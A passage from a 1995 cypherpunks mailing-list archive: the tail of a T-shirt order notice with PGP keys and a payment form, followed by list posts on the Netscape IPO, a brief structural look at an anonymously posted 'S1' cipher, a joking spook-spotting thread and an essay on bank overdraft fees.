   Large:    $15.95
   X-Large:  $15.95
   2X-Large: $17.95
   3X-Large: $19.95

No tax, shipping, or handling charges. Just send a message (PGP encrypted 
recommended - see my key below) to dhenson@itsnet.com with your desired 
shipping address, the quantity of each size that you want, and total amount 
of the order along with payment info. (See below, after my PGP key, for 
what info you need to include.) MAKE YOUR CHECK OR MONEY ORDER PAYABLE TO 
'ALH'. It is also a good idea to include your telephone number and email 
address in case there are questions about your order. (All this plus 
payment info can be sent via the Web page.)

You can send Visa/MasterCard info and personal check info in email or via 
the Web page order form. If you want to pay any other way, you will have to 
send your order via USnail to:

     West El Paso Information Network (Tshirt)
     6112 N. Mesa #218
     El Paso, Texas 79912

Here's my PGP public key (use to encrypt your order). Don't forget to
remove the '- ' at the beginning and the end of the block.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8G5lIAAAEEAKT/Hd5q2dqyyLbvE/I+GnmuxV+u79lrCAcw8fWxzi1vVQwS
bKF8DjGO+xnPdZAdryPUJoS8yitmc/pE1wFmNWeunCImu81gxhpphgbnq8/nm8/c
3q1i4/0QlofxWphxhFF3b7zQMzS7iiFZL5x7Rget5aRaWnKE855C4hMDAC3JAAUR
tCZEb24gSGVuc29uLCBXRVBJTiA8ZGhlbnNvbkBpdHNuZXQuY29tPokAlQMFEC/w
ROBsRrMZUt3z9QEBnWsEANW9SUj1ompT0lAiu0Ihu+SREgoqmbmM/eeDn2ddY49C
ojDdfdmHKRhifLsNq/HXEvbtNhu2T2kti6kRRuU8jp0ACBkpMeB9A/yuLFTnzjkO
9/p9xOGSR3ycvOfarvVjVQo0JMAQPodL6n1OuS/AXlRe6R29sAm2gvEnLMXwG/II
iQCVAwUQL+8x1r2wdU1ev5p9AQGG2AP9GS/kpmQENj3C5eAZmMGocDvR49+/y++k
LGyY7Bt0SK0kFQLrInEun/4QESzWbZ4wA7uXAEsxoy+wXepWqm/gMTND/pAhzTSH
ykSEM2aPxYdnrkmE/5kKsynq7R06NgY5ishLyxL5HwauYvqerKcr1vfgaO9FbQnG
3Vk7zXozmeOJAJUDBRAvVOm/Vcp0KbCAaB0BATZPA/96ingb1PGTtPHGfb5tFmfk
KLcxBnDvqhHm4fVxuo+QbdHDsw2HXdXjLw053Ae7Hx/lpwf9NRfpLliiR39JCARJ
5KB94TMKhHrxAaicN7wuqrbmsnQgthNN4svC1QbSSQ08r/HJnAyeTk71RgHf7Aq0
MPFDEh7wyJhT27zq/831JLQWV0VQSU4gPHdlcGluQHNnaXIuY29tPokAlQMFEC8G
52h8y4XkPC4ZpQEBkE0EAJxxVkO4ApzO7tO2Drvbipve5bjNOEvNnpzA+5F7lnLF
WddBMsP3C5V8IQ/gituSVDMfhp/D/1nD6FnJ1sP+LM2SF/wRbL6exuAG0Z74PLTf
2UGUzc8/cP3Q/imxXj77voi0Q0UVC1M5SzvlsGFr8I0W6meUJqSH0a4AYUf3WMKm
iQCVAwUQLwbmwp5C4hMDAC3JAQGsZgQAhnFNMDh9TJmbv5O9Y7KXUkYhKXFX2kFZ
p0Czx2t/94A0O9XQeRFBrGimrbRm095s+T+CJ/9C2J+AyV8heOUOGknq4d+1HTWa
GlTo/2Zu3Lh0bml7l1ovbE28O7VjMu9lBiz+X6bgccHs5YyanNLyWIYF/xDgrCkl
KMN4oOFjrSU=
=xL+f
- -----END PGP PUBLIC KEY BLOCK-----

If you're not a US or Canadian citizen or permanent resident living in the 
US or Canada, use the UK shirt offer below.

PAYMENT INFO YOU NEED TO INCLUDE IN YOUR EMAIL ORDER:

VISA/MASTERCARD

     1) Name on the card (exactly as it is printed on the card):

     2) Card Type: (Visa/MC)

     3) Card Number:

     4) Card Expiration Date:

PERSONAL CHECK

If paying by Telecheck, please follow these instructions carefully and 
double-check all your entries for accuracy and completeness.  Please note 
that the check must be drawn on a U.S. Bank.

First, take out your checkbook and write a check (made payable to 'ALH') 
just as though you were going to mail it to us.  Don't forget to enter the 
information in your check register.  Use the check you have written as the 
source of the information we will be asking for below.

The first item of information we need is the name or names printed on the 
check.  Include all spaces, commas, periods, etc exactly as printed on the 
check. (For example, if there is a period after the initial, use it . . . 
if no period, don't put one in.)  If it is a joint account, include the 
joint name also.

   Name(s) EXACTLY as it appears on your check:
   Check Number: 
   Dollar Amount: $
   Bank Name: 
   Bank Address: 
   Bank City/State/Zip: 

Across the bottom of every check is a series of funny-looking (MICR) 
numbers. These numbers include the routing codes for the bank, your account 
number, and the check number. There are also some non-numeric symbols. Just 
leave a blank space in the number where these symbols appear. Also include 
a blank space where there is a blank space in the number. After you have 
entered the numbers from left to right, it is a good idea to double-check 
them from right to left.  (It's easier to catch mistakes this way.)

   MICR Numbers: (Double-Checked)
   Enter any comments that you would like to have appear on the check as 
      memo:

If you are NOT a citizen of and living in the US or Canada:
===========================================================================

 Free world: printed in the UK for shipping to anywhere

    http://dcs.ex.ac.uk/~aba/rsa/uk-shirt.html

 Cost only (estimated cost, if there is any change, it goes to the PZLDF 
also) If you're in the US Don's offer is going to work out cheaper.

 (If you're a foreign national living in the US or Canada you should
  order through this option as it would be illegal for Don to sell to
  you)

 My prices are (all in UKP):

 Prices inclusive of UK postage, and packing, see below for overseas 
postage

   T-shirts

       only 2 sizes available: Large (L), and Extra Large (XL),
       both the same price: 8 UKP

   Sweatshirts

       only 2 sizes available: Large (L), and Extra Large (XL),
       both the same price: 14 UKP

 Overseas postage:

   Add 0.75 UKP per shirt for Europe

   Add 1.50 UKP per shirt for US & Canada

   Add 2.00 UKP per shirt for Australia, NewZealand, South Africa or other

 I will accept payment in UK currency cheques or UK cashable money orders, 
or if you want to risk cash in the post, UK cash or US cash (you bear 
risk).

 I CAN'T take credit cards etc, as I'm just a student, and don't have  
facilities for this kind of thing.  So you'll have to use cheques/cash as 
described above.

 (The costs are estimated because it is impossible to get a firm quote
  without knowing how many to order, which I can't know until I have the
  orders, so if works out cheaper due to higher volume than expected and
  there is any change left over, I will forward it to the Phil Zimmermann
  legal defense fund).

 My snail address is:

   Adam Back
   South Blagdon Farm
   Thorndon Cross
   OKEHAMPTON
   Devon
   UK
   EX20 4NJ

 Please make sure to include:

   - your email address in case of query
   - your snail mail address
   - details of choice of T-shirt or sweat-shirt and size (L or XL)
   - payment

Adam

Here is my PGP public key, if you feel the need to say anything financially 
related, or prefer secure email (you'll need to edit off the leading "- " 
which my PGP signing the whole mail has added, before you feed it to PGP):

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAiwUXUEAAAEEAJnWEHE3juLAyMnEt3hrID3t8tblJvJPfoPz4Plg+2a5y4HA
TonXBomkhm8hrRu1umruUUaeW1mxIbpvP413a2JyU7pdyfyoFVpWW5iT9pXYOgSW
65d+5GWe4g4PLrSbJZPBFIezd8xddnx5+5hbRk1K6UpfReQuOynIuJ1VakpnAAUT
tBxBZGFtIEJhY2sgPGFiYUBkY3MuZXguYWMudWs+iQCVAwUQL9gNKSnIuJ1Vakpn
AQHH6AP/T7dwXid03U7UM2/QzU+y6F4kHrGBuvJcyJewWbEb16ItkMngjzXP47kx
gZygR4MWXsyQlvE2inSYzRJ3L+6ftaPvX8JsvVCll7JIejfmNGZYSWw9E/vPi/ls
aa+pN3WqPxnzpwr8PL6b8w1fZZ47antgdZlOXgGO+hRbWV7zPcc=
=KGUk
- -----END PGP PUBLIC KEY BLOCK-----

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBebrp5C4hMDAC3JAQHXgwP/RSnLZgJiDMEa13b4Ccq0/iwaep2WXzRt
ev5zoZG8oItXYp+Rtm1WeIoOucxLR3k5y0qQKnIEYYhBixnWMU8Xo/ySLvjN8x6t
UU+Jbx802vPIRfXB99nuXdzvEsXAjB0ceyzg0iRYaOG3BI4AjFdGnsO6LwU1W1d1
6ctLmgR759k=
=PZUo
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBecOZ5C4hMDAC3JAQHQgAP9GPs/v5JV6aEAQvKTi+YcO6/5IeOMzu/y
wF17l4CBSCj3tB4XRA4cOCyZgrPXnaIvGzJztKzxcRPxhFkZM4sjvOQA13uGTH/w
YG1yN04FMZ7SsjErOHAvpm3W/S1RwLxOHVfucIoXcnFi2sRUZndfV/Kb3s0a8Ztk
BhlrLCZG164=
=/gvS
-----END PGP SIGNATURE-----
Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@telecheck.com
Date: Wed, 9 Aug 95 10:27:10 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Dir.Byway Virus (NewsClip)
In-Reply-To: <199508090639.XAA16760@jobe.shell.portal.com>
Message-ID: <9508091724.AA23965@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text/plain



Seems like a good-press piece for a small anti-viral software
company.  Just one small pick to nit:

anonymous-remailer@shell.portal.com said:
> Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit" will 
> remove the virus from infected computers. New versions of the Toolkit 
> for DOS, Windows, OS/2, and NetWare are slated to ship in late 
> summer. S&S also plans Fall 1995 introductions of Toolkits for 
> Macintosh, SCO Unix, Windows 95, and Windows NT server and 
> workstations.

What?  Toolkit?  A virus toolkit?

Windows NT has an abstracted and object oriented design.  User mode
programs no longer have access to the hardware (ie., you no longer
have access to the boot sector, and cannot hook an interrupt).  In
short, viruses are much less likely to function under NT, yet these
blood-sucking people can't wait to introduce software for it...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KALLISTE@delphi.com
Date: Wed, 9 Aug 95 09:30:14 PDT
To: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
Message-ID: <01HTVAYUCH6W90PB08@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
	Many people are interested in cryptology because they don't
want the NSA (among others) invading their privacy.  The Foster story
concerns the chief NSA privacy-invasion of modern times:  spying on
domestic banking transactions.  So it's relevant.
	The Grand Inquisitor role is getting a little old.  So if
you want to continue to play it, my response is:  Fuck Off.

-Orlin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 9 Aug 95 12:32:54 PDT
To: rfb@lehman.com
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <9508091859.AA16290@cfdevx1.lehman.com>
Message-ID: <199508091932.MAA22814@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
>     Date: Wed, 09 Aug 1995 10:17:30 -0400
>     From: Duncan Frissell <frissell@panix.com>
> 
>     I was watching CNBC this morning while reading my mail and they had a story
>     on the Netscape Communications IPO (ticker NSCP btw).
> 
> Apparently the opening price was doubled very shortly before the IPO
> (late yesterday afternoon) from $14 to $28.  By lunch-time (in NYC),
> shares were trading at $72.

Amazing aint it - a moron girl at Goldman Sachs of course told me I was 
crazy and anyone who felt Netscape was going to go over the top was a moron.

I guess these corporate types are going to have to get used to the idea 
that the "net" is here to stay and a huge industry to boot. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Wed, 9 Aug 95 11:17:25 PDT
To: cypherpunks@toad.com
Subject: Re: Trouble accessing archive with Netscape
Message-ID: <199508091814.OAA11696@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199506281259.AA03051@bear-gate.bear.com>,
David Mandl <dmandl@bear.com> wrote:
>> From: shamrock@netcom.com (Lucky Green)
>> 
>> Am I the only one that has problems accessing the archives using Mac
>> Netscape 1.1N?
>
>I had the same problem.

(And Tim reports the same).

Huh.  Since I only use lynx and arena, I haven't seen this.  But I'll
take y'all's word for it.

Since I'm about to toss hypermail out the window and replace it with my
own code (that I'm working on anyway for a consulting gig -- one of
the benefits of running the archives is having a test-bed for large
archives), you can reasonably expect the problem to go away in the
not-too-distant future.

I'll probably ask for people to test the new HTML when it's ready.
- -- 
Todd Masco     | "Don't be too proud of this technological terror you've
cactus@hks.net |   constructed."        - Darth Vader   
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCj7BSoZzwIn1bdtAQEVRgF5AXaw25/1H4dfrGGuCtNhXm4wg23f9nnR
q8HOzsnbVkznKal8wtzvgblofYtjekTK
=ZC4N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Wed, 9 Aug 95 12:33:49 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Sizzling!!! Was: Crypto = Co
In-Reply-To: <ac4e530c13021004688c@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950809141541.16691A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. Bank President,

Seems? All of the Net' stocks are far outpacing my Coca-Cola shares
right now. And, my Coke stock is at all time highs. My Coke stock is
up 1150% in 10 years. Sizzling appears to be a better word for it.

Good Coke traders everywhere ARE trying to cash in on this very
fab trading pattern. It looks to me that Viacrypt would do really
well when PGP 3.0 comes out, particularly if it has a GUI interface.

And if TCMAY ever became a "pink sheet" stock, I'd stop everything
and buy some shares in it. 

Love Always,

Carol Anne

On Wed, 9 Aug 1995, Timothy C. May wrote:
> It seems that anything involving the Internet, the Web, and digital
> commerce is really, really hot.
> --Timothy C. May, President, Bank of the Web
> tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 9 Aug 95 12:01:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto = Competitive Advantage?
In-Reply-To: <199508091417.KAA17510@panix.com>
Message-ID: <9508091859.AA16290@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 09 Aug 1995 10:17:30 -0400
    From: Duncan Frissell <frissell@panix.com>

    I was watching CNBC this morning while reading my mail and they had a story
    on the Netscape Communications IPO (ticker NSCP btw).

Apparently the opening price was doubled very shortly before the IPO
(late yesterday afternoon) from $14 to $28.  By lunch-time (in NYC),
shares were trading at $72.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 9 Aug 95 12:06:09 PDT
To: cypherpunks@toad.com
Subject: PGP at work?
Message-ID: <9508091904.AA16481@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the FAQ.  Really, I've spent the last hour scanning the
distributed docs and hopping around to different web pages looking for
this info.

What constitutes ``commercial use'' of PGP?

I could swear (if I were a theist :-) that I'd seen some sort of
statement from RSADSI, PKP and/or MIT that it is ok to use PGP for
mail at work providing that the *purpose* of the mail is not
commercial.  Could someone confirm or deny this, preferably with a
reference?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbryan@maroon.tc.umn.edu (Steve Bryan)
Date: Wed, 9 Aug 95 13:19:23 PDT
To: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
Message-ID: <v02130501ac4ebd418bbb@[134.84.101.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 pm 8/9/95, KALLISTE@delphi.com wrote:
>Perry,
>        Many people are interested in cryptology because they don't
>want the NSA (among others) invading their privacy.  The Foster story
>concerns the chief NSA privacy-invasion of modern times:  spying on
>domestic banking transactions.  So it's relevant.
>        The Grand Inquisitor role is getting a little old.  So if
>you want to continue to play it, my response is:  Fuck Off.
>
>-Orlin

I'm thankful that someone can occassionally (or even always) point out that the messages are getting rather far from what is considered the main topics of the list. This is a very high volume mailing list, at least three times as high as anything else I try to read. I didn't subscribe to a conspiracy buff list but it is not my intention to go out of my way to insult anyone here. But there are lists (aren't there?) for people who find such speculation interesting.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 9 Aug 95 13:23:23 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <9508092021.AA02019@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Jason Weisenberger writes:
>  > Apparently the opening price was doubled very shortly before the
>  IPO > (late yesterday afternoon) from $14 to $28.  By lunch-time
>  (in NYC), > shares were trading at $72.
>
>  Amazing aint it - a moron girl at Goldman Sachs of course told me
>  I was crazy and anyone who felt Netscape was going to go over the
>  top was a moron.

It may have "opened" at $28, but the first bid was $71 and now it's trading  
at $50something.  Not quite so spectacular as at first glance...  So unless  
you shorted it or were an insider it wasn't such a hot thing (so far).   
Quarterdeck is probably a better buy.

ob crypto:  the "top secret" source just posted looks interesting... 64-bit  
blocks, 80-bit keys, 32 rounds hmmmm....

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 16:00:53 PDT
To: cypherpunks@toad.com
Subject: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508092259.PAA10092@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I suppose the unstated implication is that this might be Skipjack.

I have looked at the program a bit and have a few observations:

There is an obvious typo in the "g" function, whose first parameter
should be 0 or 1, but which tests it for 0, 1, or 2.  This suggests an
amateur effort.  The coding style in general suggests a lack of familiarity
with C (absence of "for" loops, with equivalent "while" loops substituted).

The program appears to be based on a hardware-based description of the
algorithm, judging from comments and style.

The algorithm uses two fixed arrays F and G.  Comments indicate that F
was designed as four independent arrays F0, F1, F2, and F3.  These are
suposed to be non-linear.  Each takes 8 bits in and 8 bits out.  G is
two arrays, each 8 bits in and 1 bit out.  The comments indicate that
it is supposed to be "pseudo-linear".  G1 is the odd parity function.
G0[i] is 0 0 1 1 0 1 1 0 0 1 repeated over and over.  This is unusual
because it is period 10 (the second 5 bits are the inverse of the first
5).  I don't know whether there would be a more concise algorithmic
representation of G0.

Key size is 80 bits.  The program implements the ability to hold 5 keys
at once.  Block size is 64 bits.  The keys are expanded internally into a
large array.  I haven't looked at the key scheduling in detail.

The encrypt and decrypt block functions have fixed xor's applied to the
64 bits of input and output.  This appears to be cryptographically
useless (or at least not very useful), similar to the initial
permutation in DES.  It is curious that xor's are used here rather than
a permutation.  That may represent an attempt to design the cipher to
run well in software.

The encryption function itself is a modified Feistel type cipher, with
the blocks broken into 8 pieces and xor'd with functions involving F,
G, the key and other pieces in a reversable pattern.  The loop iterates
32 times but only two of the 8 pieces are changed each iteration so
each 8 bit piece actually gets modified only 8 times.  The pattern is:

	piece 6 modified by pieces 4, 5, 2, 3
	piece 7 modified by pieces 4, 5, 0, 1
	piece 0 modified by pieces 6, 7, 4, 5
	piece 1 modified by pieces 6, 7, 2, 3
	piece 2 modified by pieces 0, 1, 6, 7
	piece 3 modified by pieces 0, 1, 4, 5
	piece 4 modified by pieces 2, 3, 0, 1
	piece 5 modified by pieces 2, 3, 6, 7

repeated 8 times.  Decryption goes in the inverse order as is typical of
these ciphers.

The key is basically 80 bits, however there is a function S1_create_key
which pads it with 16 bits of 0 and then encrypts it with two overlapping
encryptions using the all-zeros key.  The resulting 96 bit key is then
fed as input to S1_load_key which decrypts it and checks for the 0's to
ensure validity.

I am not much of a cryptanalyst, but from what I understand the overall
security of a Feistel-type cipher like this depends a great deal on the
structure of the F (and in this case G) boxes.  I would not be at all
qualified to analyze those.  So potentially this may be a strong cipher
or it may be weak.  The actual implementation does as I remarked show
some signs of amateur programming skills.  In addition to the points
mentioned it is curious that the G arrays are initialized with a list of
256 values rather than taking advantage of the apparent regularities
noted.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 16:11:36 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system
Message-ID: <199508092310.QAA11567@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Correction, I just noticed that the four F functions have 4 bit output
not 8 as I wrote.  Realize that all this is based on a very cursory
examination of the code.
 
BTW I just was starting to look at the key scheduling and I noticed that
fullkey is indexed in its 2nd slot by i*2 where i goes from 0 to 31, but
is only declared as being 32 in size in that slot.  So I think this is
another typo, probably the index should be i.  This kind of thing does
not inspire confidence...
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Wed, 9 Aug 95 00:09:42 PDT
To: cypherpunks@toad.com
Subject: Re: How To Spot a Spook page
In-Reply-To: <199508090550.AAA07775@arnet.arn.net>
Message-ID: <Pine.SUN.3.91.950809170713.24119G-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Aug 1995, David K. Merriman wrote:

> As a start on a Web page, here are some things I thought of. What else? What
> are the initials of some of the world's intelligence groups (CIA, NSA, KGB,
> DGI, MI5(?), ???)

In Australia: ASIO, ASIS, JIO, could be more...

> 1> Antennas - more than TV/Ham/CB/Satellite (or 'unusually' shaped antennas).

You should see some of the ones I've built...

> 2> No, or *very* few, visitors (esp. kids)

I don't encourage visitors.

> 3> Visitors are seldom the same, or almost always the same.

But the same ones arrive anyway.

> 4> Doesn't talk about job/company.

I rarely discuss my job.

> 5> Activity at 'unusual' times.

I work funny hours at times.

> 6> Not very 'sociable' (keep to themselves).

That's me.

Oh dear, I've blown my cover...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 9 Aug 95 18:34:58 PDT
To: Matt Blaze <cypherpunks@toad.com
Subject: This summer's special delivery?
Message-ID: <ac4eb0c9030210046e6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 8/9/95, Matt Blaze wrote:

>Someone sent me (to my bell labs address) a copy of this this afternoon via
>an anon server in the netherlands.  It looks like others got it as well, and
>it appears to have been posted to the cypherpunks list, though it hasn't
>yet shown up here from the list (my mail seems to be slow today).  Did
>anyone else have a copy mailed directly to them?

I got a copy mailed to me directly as well. I don't know why he/she/it sent
it me, but I got it.

I have nothing further to add on this. But recall that it was just about
this time last year--just before Crypto--that the "alleged RC4 code" was
posted anonymously to the list.

Hmmhhh....

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 9 Aug 95 16:06:07 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Bank Fees and E-Cash
Message-ID: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

- - - Bank Fees and the E-cash Niche.

Banks have gorged themselves on rocketing fees for the last five 
years.  The result is that typical bank customer currently pays 
150% of the amount of interest collected on accounts in a given 
year in the form of fees.  My prediction, and my hope, is that e-
cash will cut through the pretense upon which the rationalization 
of many of these fees is based, and even market itself on this 
point- Lower Fees.


- - - New Fee Schemes

"Overdraft Assistance" and the Myth That Only Irresponsible Bank 
Customers Bounce Checks or Overdraft.

Banks have begun to implement policies intended to help the 
customer overdraft.  They may, for example, cash the largest 
checks first such than an overdraft will hit with several small 
checks rather than one or two large ones causing multiple 
overdraft fees.  Banks have begun to routinely delay crediting 
checks for 48 and 72 hours, and out of state checks for anywhere 
from 3-14 business days.  ATM cash deposits are typically subject 
to 24-48 hours delay.

The "Unofficial Credit."

Many times the delays in crediting various transactions are hidden 
by the "unofficial credit."  Most noticeable in ATM deposits, a 
credit is given but should demands on the account draw into the 
"unofficial credit" an overdraft will be posted on the rationale 
that an "official credit" has not yet been posted and the funds 
are thus not "officially" available, this despite the fact that 
the funds will appear available to ATM balance requests and 
statements.  Of course the bank will profit from the "unofficial 
credit" to "official credit" interest float regardless of what 
overdraft fees might be charged.
The "wire credit" and "official wire credit" are another example.  
Banks receive a wire transfer on Monday, send a "electronic 
payment advice" the same day, but post the credit to the account 
"officially" on Tuesday.  The original intent is for the bank to 
be able to take advantage of the interest "float" between the 
receipt of funds and its credit to the account.  The result is an 
additional overdraft potential.

The Separate Wire Office Hours.

Often times the bank's "wire" office will close hours before the 
branch closes.  Wires received some hours before closing on Friday 
will not be credited until the following Monday.

The ATM Processing Time Table.

Many bank only begin processing ATM deposit transactions an hour 
before closing, crediting only as many deposits as can be 
processed in this time, the remainder are not processed until the 
next morning.  ATM debits are, of course, processed all day.

Check Processing Time Table.

In a given day, debit checks are processed on an account before 
deposit checks are processed.  Obviously, an account that 
overdrafts overdrafts only because of the order in which checks 
are processed.


- - - The Created Convenience Fee

A great many bank fees fall into what I call "created convenience 
fees."  Really created convenience fees resemble airport customs 
bribes in third world countries.  The customs officer makes what 
should be an easy passage terribly difficult, then demands a "fee" 
to make travel as easy as it should have been to begin with.  The 
net effect is for the traveler to pay to dispense with a problem 
created by the party receiving the fee.

Nigeria is a prime example.  Upon arrival the average traveler 
will find him or herself embroiled with licensing deficiencies, 
visa fees, entry fees, the threat of quarantine, seizure of 
expensive equipment for "inspection" and other such invented 
requirements.  Some hours into the "negotiations" the customs 
official will offer to "overlook" these transgressions for a 
"fee."  This is a created convenience fee.

Banks fall into this category by such programs as "overdraft 
insurance" whereby banks enact policies which, as we have seen, 
make it painfully easy to overdraft and then charge a monthly fee 
to avoid the overdraft charges.

- - - The Result

Bob is a sort of combination of my own experience and discussions 
with other bank customers in D.C.

Bob has an account in Washington, D.C. with $1500.00 in it.
Bob Receives a wire at 3pm Friday for $1700.00
Bob writes five checks on Friday, one for $1400.00, one for
  $200.00, one for $150.00 and two for $100.00.  Totaling
  $1950.00.
Bob deposits 4 checks totaling $2000.00 in the night depository
  Saturday.
Bob deposits $50.00 in cash in an ATM on Saturday Night.
Bob checks his ATM balance ($3250.00) and withdraws $50.00 from an
  ATM on Sunday Morning.

Bob's wire arrives after the wire office has closed for the day - 
  an "unofficial credit" is posted Friday before closing anyhow.
Bob's bank processes the $1400.00 check first, leaving Bob's
  account with an "official" $100.00 and $1700.00 in "unofficial
  funds."
Bob's bank processes the $200.00 check, notes a $100.00 overdraft,
  charges $25.00 for this check, refuses payment on the remaining
  three checks and drops a $25.00 overdraft fee plus a $10.00 "bad
  check" fee for each.  Total charges:  $130.00
Bob's bank processes the $50.00 ATM withdrawal, which overdrafts.
  $25.00 fee is posted.  Total fees so far:  $155.00.
Bob's balance for the majority of Monday:  -$255.00.

Bob's bank begins to process deposits, notes all the checks for
  deposit, $1000.00 of which are out of state.  No checks are
  credited.
Bob's bank notes the ATM transaction at the end of the day on
  Monday, but does not credit it immediately despite the fact that
  it is cash.
Bob's bank credits the ATM deposit to Bob's account on Tuesday.
Bob's balance is now -$205.00  Middle of the day Tuesday, Bob's
  account has been below its required minimum $500 balance for 24 
  hours.  A $50.00 fee is charged.  End of the day Bob's wire is 
  "officially" credited - a $10.00 fee is charged for receiving 
  the wire. (No, I'm not kidding)
Bob's bank credits the $1000.00 of in state checks on Wednesday
Finally, on Friday, Bob's out of state checks are deposited.

Bob will likely be liable for $50.00-$75.00 fees for each of his 
bounced checks as vendors will probably charge hefty fees.

Telecheck will have Bob on the 10 most wanted list for $350.00 in 
bounced checks.  Bob's check writing ability is about nil in D.C. 
for the month it will take him to clear it up.

